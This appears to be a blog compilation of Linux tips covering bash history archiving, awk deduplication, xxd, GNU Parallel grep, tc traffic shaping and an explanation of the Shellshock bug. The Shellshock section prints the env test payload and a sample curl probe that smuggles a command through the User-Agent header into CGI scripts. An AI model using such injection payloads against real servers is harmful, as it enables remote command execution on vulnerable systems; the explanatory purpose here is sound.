Archiving command history in Linux

#!/bin/bash
umask 077
max_lines=10000
linecount=$(wc -l < ~/.bash_history)
if (( linecount > max_lines )); then
        prune_lines=$(( linecount - max_lines ))
        # Append the oldest lines to the archive, then rewrite the history
        # file without them; $$ keeps the temp file name unique.
        head -n "$prune_lines" ~/.bash_history >> ~/.bash_history.archive \
                && sed -e "1,${prune_lines}d" ~/.bash_history > ~/.bash_history.tmp$$ \
                && mv ~/.bash_history.tmp$$ ~/.bash_history
fi

via BashFAQ/088 – Greg’s Wiki.

I needed to manage shell command history in a formal fashion so I could turn repeated sequences into scripts without typing them in again.  I also wanted a record of which packages I installed and in what order.  The command history is kept in the .bash_history file, which is read once when a terminal opens.  Running set -o vi allows history commands to be recalled using standard vi commands.  The above script can be run as a user-level cron job to periodically prune the oldest commands and place them into an archive.
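
For example, a user crontab entry (added with crontab -e) could run it nightly.  This is just a sketch; the path $HOME/bin/prune_history.sh is a hypothetical name for wherever the script above gets saved:

0 3 * * * $HOME/bin/prune_history.sh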

The bash statements below set the history sizes and make each command get written to the history file immediately, not just when a terminal closes.  They should be placed in .bashrc or whatever file executes when a new terminal opens.

HISTFILESIZE=400000000        # maximum number of lines kept in ~/.bash_history
HISTSIZE=10000                # maximum number of lines kept in memory for the session
PROMPT_COMMAND="history -a"   # append new lines to the history file after every command
export HISTSIZE PROMPT_COMMAND

shopt -s histappend           # append to the history file on exit instead of overwriting it

Remove duplicates without sorting file

Usually, whenever we have to remove duplicate entries from a file, we sort the entries and then eliminate the duplicates using the “uniq” command.

But if we have to remove the duplicates and preserve the same order of occurrence of the entries, here is the way:

via UNIX Command Line: Remove duplicates without sorting file – BASH.

$ awk '!x[$0]++' file3

From: Unix: removing duplicate lines without sorting

This command is simply telling awk which lines to print. The variable $0 holds the entire contents of a line, and the square brackets are array access. So, for each line of the file, the element of the array x indexed by the line's contents is incremented, and the line is printed if that element was not (!) previously set. Because ++ is a post-increment, the test sees the old value: zero (false) on the first occurrence of a line, non-zero (true) on every later one.
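
A quick demonstration, with made-up file contents:

$ printf 'apple\nbanana\napple\ncherry\nbanana\n' > file3
$ awk '!x[$0]++' file3
apple
banana
cherry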

Linux Command: xxd


[rmiller@pacific]# echo "hello world" > hello
[rmiller@pacific]# xxd hello
0000000: 6865 6c6c 6f20 776f 726c 640a            hello world.

So you can use this tool to byte edit files. One rather unusual use I’ve found for it is to paste in an RPM to a system that I only had serial console access to. I just ran xxd on it, copied it into the buffer, and pasted it into a file on the remote server. A quick xxd -r, and voila. RPM.
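
The round trip looks roughly like this; the file names here are placeholders rather than anything from the original post:

xxd package.rpm > package.rpm.hex       # dump the binary as plain-text hex
# ...paste package.rpm.hex through the serial console into a file...
xxd -r package.rpm.hex > package.rpm    # rebuild the binary on the far side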

via Linux Tips and Tricks.

I recently ran across the above blog entry, which is from 2010.  All these years working with Unix systems and I never knew about this command.  When I parse a web site to extract information, I need to output clean, concise ASCII data for my downstream scripts.  My Perl scripts that parse the HTML filter most of this out, but sometimes a funny character gets through.  Normally I have been using hexedit to determine the hex code of the offending character, and although that works, it's not as elegant as the above xxd command.  Now I can do the following:

xxd offendingdatafile.txt | grep "mystring" | more

The above outputs the dump lines containing the offending hex code, provided I can spot a unique searchable string (mystring) near the offending character for grep to match.  I could also:

xxd offendingdatafile.txt > myfile.dat
vi myfile.dat

Instead of using clunky hexedit to search for mystring, I can use good old vi.
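
And once the offending bytes are fixed in vi, the dump can be turned back into a plain file.  This assumes the edit kept xxd's column layout intact, which xxd -r needs in order to reverse the dump:

xxd -r myfile.dat > cleandatafile.txt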

I'm sure there are lots of other uses for this utility, especially in shell scripts.  Unix has so many commands, and I utilize a subset adequate for getting done whatever I need to do.  Every year I pick up one or two new useful commands that are more efficient, and xxd is one of them.

Shellshock: How does it actually work?

env x='() { :;}; echo OOPS' bash -c :
The “env” command runs a command with a given variable set. In this case, we’re setting “x” to something that looks like a function. The function is just a single “:”, which is a simple command defined as doing nothing. But then, after the semicolon that signals the end of the function definition, there’s an echo command. That’s not supposed to be there, but there’s nothing stopping us from doing it.

via Shellshock: How does it actually work? | Fedora Magazine.

But — oops! When that new shell starts up and reads the environment, it gets to the “x” variable, and since it looks like a function, it evaluates it. The function definition is harmlessly loaded — and then our malicious payload is triggered too. So, if you run the above on a vulnerable system, you’ll get “OOPS” printed back at you. Or, an attacker could do a lot worse than just print things.

I copied and pasted the above env command and it echoes back OOPS.  This web server has (I suspect) already been scanned once, with the scanner placing a ping command in the User-Agent HTTP header.  Apparently the User-Agent value gets passed to CGI scripts through a shell environment variable, which a vulnerable bash will then execute.  The only problem for the attacker is that they need some kind of CGI script to trigger, and there are none on this site; the scanner simply got back 404, file not found.
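
A probe along those lines would look roughly like the following; the URL and the ping target are hypothetical stand-ins for whatever a scanner actually sends.  The CGI interface copies the header into the HTTP_USER_AGENT environment variable before the handler runs, which is what makes the header a delivery vehicle:

curl -A '() { :;}; /bin/ping -c 1 probe.example.com' http://target.example.com/cgi-bin/status.cgi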

This could be problematic on sites with a lot of CGI scripts.  There is also an exploit that can affect a client using DHCP to obtain an IP address from a malicious server.  I'll find an explanation of that and put it up in its own post.  This story is evolving and even has its own brand name now: Shellshock.

Console Internet Applications

Console-based applications are light on system resources, very useful on low-specification machines, can be faster and more efficient than their graphical counterparts, do not stop working when X Windows is restarted, and are great for scripting purposes. When designed well, console applications offer a surprisingly powerful way of using a computer effectively. The applications are leaner, faster, easier to maintain, and remove the need to have a whole gamut of libraries installed.

via Pick of the Bunch: Console Internet Applications – Linux Links – The Linux Portal Site.

Speeding Up Grep Log Queries with GNU Parallel

Enter GNU Parallel, a shell tool designed for executing tasks in parallel using one or more computers. For my purposes I just ran it on a single system, but wanted to take advantage of multiple cores.

Having enough memory on my system, I loaded the entire massive file into memory and piped it to GNU Parallel, along with another file consisting of thousands of different strings I want to search for, the “PATTERNFILE”:

cat BIGFILE | parallel --pipe grep -f PATTERNFILE

via Speeding Up Grep Log Queries with GNU Parallel – The State of Security.
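
The same idea can be tuned a little.  This is a sketch assuming GNU Parallel is installed; --block sets how much input each grep chunk receives and -j caps the number of simultaneous jobs, with both values here being illustrative:

parallel --pipe --block 10M -j "$(nproc)" grep -f PATTERNFILE < BIGFILE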

tc: Linux HTTP Outgoing Traffic Shaping (Port 80 Traffic Shaping)

I've a 10Mbps server port dedicated to our small business server. The server also acts as a backup DNS server, and I'd like to slow down outbound traffic on port 80. How do I limit the bandwidth allocation of the http service to 5Mbps (bursting to 8Mbps) at peak times, so that DNS and other services will not go down due to heavy activity, under Linux operating systems?

You need to use the tc command, which can slow down traffic for a given port or service on a server; this is called traffic shaping:

via tc: Linux HTTP Outgoing Traffic Shaping (Port 80 Traffic Shaping).
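
A minimal sketch of that kind of shaping, using tc's HTB queueing discipline and assuming eth0 is the public interface; the class IDs and the catch-all class rate are illustrative choices of mine, not taken from the article:

tc qdisc add dev eth0 root handle 1: htb default 20
tc class add dev eth0 parent 1: classid 1:1 htb rate 10mbit
tc class add dev eth0 parent 1:1 classid 1:10 htb rate 5mbit ceil 8mbit    # http
tc class add dev eth0 parent 1:1 classid 1:20 htb rate 5mbit ceil 10mbit   # everything else
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip sport 80 0xffff flowid 1:10

The u32 filter matches the source-port field of outgoing packets, so replies from the web server land in the 5Mbps class (able to burst to 8Mbps), while DNS and everything else falls through to the default class.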